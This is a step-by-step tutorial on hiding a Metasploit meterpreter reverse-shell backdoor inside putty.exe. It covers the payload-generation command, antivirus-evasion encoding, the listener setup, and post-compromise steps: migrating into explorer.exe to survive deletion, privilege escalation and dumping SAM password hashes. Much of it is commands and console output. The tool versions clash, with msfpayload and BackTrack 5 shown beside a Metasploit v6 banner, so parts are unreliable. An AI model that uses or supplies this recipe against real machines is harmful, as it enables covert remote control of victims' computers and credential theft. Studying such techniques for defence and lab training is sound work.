Backdooring with Metasploit
by Oddacon T. Ripper
Metasploit is a free, open-source pen-testing tool originally created by H.D. Moore in 2003.
Coded first in Perl, the Metasploit Framework was later converted to Ruby, and then officially signed over and picked up by the security group Rapid7.
Metasploit is available for all operating systems and comes pre-installed with BackTrack Linux, which is the OS I will be using in this article.
The good folks over at Offensive Security just released BackTrack 5. So if you're new to BackTrack, I recommend downloading the ISO and booting live from a USB thumbdrive or DVD-R.
Once you have everything configured correctly, booted up, logged on, and connected to "your" Internet, we can finally set up our Metasploit attack!
To ensure we stay within the parameters of the law, I will be doing this Metasploit attack on my Windows 7 box. We're just going to do a basic attack, inserting a backdoor into a EXE file.
We could just create a EXE backdoor, but that's no fun! Instead, let's overwrite an already existing EXE file and install the backdoor onto that.
I'm going to use the program: putty.exe
Of course, you can choose whichever EXE you would like. After you have an EXE of your liking we can create the backdoor using the payload command.
First, open a terminal and type:
$ msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.2 LPORT=1337 R | msfencode -t exe -e x86/shikata_ga_nai -c 1 -x /home/oddacon/Desktop/putty.exe -o /home/oddacon/Desktop/putty_h4x.exeWhere msfpalyoad is the program that will create our backdoor and windows/meterpreter/reverse_tcp is the type of payload we are using.
LHOST, obviously, is your local IP.
LPORT is the local port we are going to be listening on later.
The R defines using raw mode, and the pipe break (|) says we want to use another command: the encoder program msfencode to hopefully bypass the victim's anti-virus.
-t exe says we are encoding a Windows binary.
-e defines the encoder to use.
The x86/shikata_ga_nai is generally best, but there are several other encoders to choose from, as I will explain later.
-c 1 defines the number of times to encode - I encoded just once.
And finally we specify the paths: -x /home/oddacon/Desktop/putty.exe is the path to where putty.exe or the EXE file you have chosen resides.
-o /home/oddacon/Desktop/putty_h4x.exe specifies the path you want the EXE with the backdoor to go.
Once you have executed that, you should see the output message:
[*] x86/shikata_ga_nai succeeded with size 318 (iteration=1)We now have our backdoor "payload" ready for the victim to use.
We can then set up Metasploit to act as our server and wait for the victim's incoming connection through the backdoor EXE we just made.
Type clear and fire up the Metasploit console:
$ msfconsole Metasploit tip: Display the Framework log using the log command, learn more with help log .,,. . .\$$$$$L..,,==aaccaacc%#s$b. d8, d8P d8P #$$$$$$$$$$$$$$$$$$$$$$$$$$$b. `BP d888888p d888888P '7$$$$\""""''^^`` .7$$$|D*"'``` ?88' d8bd8b.d8p d8888b ?88' d888b8b _.os#$|8*"` d8P ?8b 88P 88P`?P'?P d8b_,dP 88P d8P' ?88 .oaS###S*"` d8P d8888b $whi?88b 88b d88 d8 ?8 88b 88b 88b ,88b .osS$$$$*" ?88,.d88b, d88 d8P' ?88 88P `?8b d88' d88b 8b`?8888P'`?8b`?88P'.aS$$$$Q*"` `?88' ?88 ?88 88b d88 d88 .a#$$$$$$"` 88b d8P 88b`?8888P' ,s$$$$$$$"` 888888P' 88n _.,,,ass;: .a$$$$$$$P` d88P' .,.ass%#S$$$$$$$$$$$$$$' .a$###$$$P` _.,,-aqsc#SS$$$$$$$$$$$$$$$$$$$$$$$$$$' ,a$$###$$P` _.,-ass#S$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$####SSSS' .a$$$$$$$$$$SSS$$$$$$$$$$$$$$$$$$$$$$$$$$$$SS##==--""''^^/$$$$$$' _______________________________________________________________ ,&$$$$$$'_____ ll&&$$$$' .;;lll&&&&' ...;;lllll&' ......;;;llll;;;.... ` ......;;;;... . . =[ metasploit v6.3.46-dev ] + -- --=[ 2378 exploits - 1233 auxiliary - 416 post ] + -- --=[ 1388 payloads - 46 encoders - 11 nops ] + -- --=[ 9 evasion ] Metasploit Documentation: https://docs.metasploit.com/ msf6 >Be patient, as it will take a moment to load all the exploits, payloads, and other goodies. After loading, Metasploit will tell you how many "goodies" you have in your framework and when you last updated it.
You can always update by typing: svn up and you can also view the different exploits, payloads, etc. by typing:
msf6 > show exploits msf6 > show payloads msf6 > show encoders msf6 > show etc..Since this is a manual attack, we are going to use the generic payload handler: multi/handler
So after the Metasploit console loads up, type:
msf6 > use exploit/multi/handlerMetasploit will then recognize that we are using this exploit and return:
[*] Using configured payload generic/shell_reverse_tcp msf6 exploit(multi/handler) >on a new line in the console. Then we set the payload to the same one we used earlier in creating the backdoor file:
msf6 > set PAYLOAD windows/meterpreter/reverse_tcpMetasploit should return:
PAYLOAD => windows/meterpreter/reverse_tcpif done correctly. Next, set the LHOST to your IP:
msf6 > set LHOST 192.168.1.2 (which is my IP)and then the local port:
msf6 > set LPORT 1337 (the same we used to create the payload earlier)Everything is now set up, but before we execute and run our server, we can type:
msf6 > show options Module options (exploit/multi/handler): Name Current Setting Required Description ---- --------------- -------- ----------- Payload options (windows/meterpreter/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none) LHOST 192.168.1.2 yes The listen address (an interface may be specified) LPORT 1337 yes The listen port Exploit target: Id Name -- ---- 0 Wildcard Target View the full module info with the info, or info -d command.to make sure everything is running properly.
Then type exploit to start the server and wait for our victim to run the backdoor: putty_h4x.exe
[*] Starting the payload handler... [*] Started reverse handler on port 1337 [*] Sending stage (723456 bytes) [*] Meterpreter session 1 opened (192.168.1.2:1337 -> 192.168.1.4:1134) meterpreter>It did not take long (since this is a simulated attack!) for our victim to run the putty_h4x.exe file.
As you can see, Metasploit opened a session from our victim: 192.168.1.4
Now that we have established a connection using the command interpreter meterpreter. Let's get to work!
First, type ps to get a list of the systems running processes. And then type: migrate [PID #]
For instance, I type migrate 2976 where 2976 is the PID number of the system's EXPLORER.EXE process.
[*] Migrating to 2976... [*] Migration completed successfully.Our backdoor is now within the EXPLORER.EXE process, so if the victim decides to delete putty_h4x.exe, the backdoor connection will not be broken.
From here, we can do a number of things.
For instance, the command getuid will return the current user the victim is running on.
The command getsystem will elevate your privilege.
Typing hashdump will display the contents of the SAM database.
There are still a number of commands we can such as downloading and uploading files, recording keystrokes, and other information, even shutting down the system.
For more info on meterpreter commands just type ? or help for the help menu.
And check out offensive-security.com/metasploit-unleashed for more information on the Metasploit Framework.